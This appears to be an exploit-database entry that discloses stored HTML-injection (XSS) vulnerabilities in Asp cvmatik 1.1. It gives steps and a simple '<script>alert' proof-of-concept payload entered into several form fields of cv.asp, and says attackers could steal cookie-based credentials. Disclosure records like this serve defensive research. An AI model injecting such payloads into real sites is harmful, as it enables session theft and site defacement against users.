header-logo
Suggest Exploit
vendor:
Asp cvmatik
by:
Unknown
N/A
CVSS
N/A
HTML-injection
Unknown
CWE
Product Name: Asp cvmatik
Affected Version From: 1.1
Affected Version To: 1.1
Patch Exists: Unknown
Related CWE: Unknown
CPE: Unknown
Metasploit:
Other Scripts:
Platforms Tested:
Unknown

Asp cvmatik HTML Injection Vulnerabilities

Asp cvmatik is prone to multiple HTML-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in dynamically generated content. Attacker-supplied HTML and script code would execute in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user; other attacks are also possible.

Mitigation:

Unknown
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/25008/info

Asp cvmatik is prone to multiple HTML-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in dynamically generated content.

Attacker-supplied HTML and script code would execute in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user; other attacks are also possible.

Asp cvmatik 1.1 is vulnerable. 

<html><head></head><body>1-http://www.example.com/cv.asp

You write xss code in  page's text box

Adý <script>alert("G3");</script>
or
Soyadý<script>alert("G3");</script>
or
Ehliyet  <script>alert("G3");</script>
or
Askerlik    <script>alert("G3");</script>
or
GSM   <script>alert("G3");</script>
etc...

Press to "tamam"(ok) button.

2-next page

</body></html>